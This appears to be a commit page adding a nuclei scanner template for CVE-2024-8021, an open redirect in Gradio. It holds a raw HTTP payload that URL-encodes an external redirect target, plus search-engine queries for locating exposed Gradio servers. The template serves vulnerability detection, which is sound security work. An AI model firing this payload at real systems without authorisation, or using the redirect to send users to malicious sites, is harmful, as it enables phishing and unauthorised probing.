Merge pull request #10935 from projectdiscovery/CVE-2024-8021

Create CVE-2024-8021.yaml (Gradio - Open Redirect Bypass via URL encoding)
patch-12
Ritik Chaddha 2024-10-07 13:26:22 +04:00 committed by GitHub
commit e6a15cfd4a
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 40 additions and 0 deletions

View File

@ -0,0 +1,40 @@
id: CVE-2024-8021
info:
name: Gradio - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
Gradio allows an open redirect bypass via URL encoding, enabling attackers to redirect users to malicious sites. This can lead to phishing attacks and loss of trust in the application.
reference:
- https://huntr.com/bounties/adc23067-ec04-47ef-9265-afd452071888
metadata:
verified: true
max-request: 1
vendor: gradio_project
product: gradio
shodan-query:
- http.html:"__gradio_mode__"
- http.title:"gradio"
fofa-query:
- body="__gradio_mode__"
- title="gradio"
google-query: intitle:"gradio"
tags: cve,cve2024,redirect,oast,gradio
http:
- raw:
- |
GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
part: header
- type: status
status:
- 302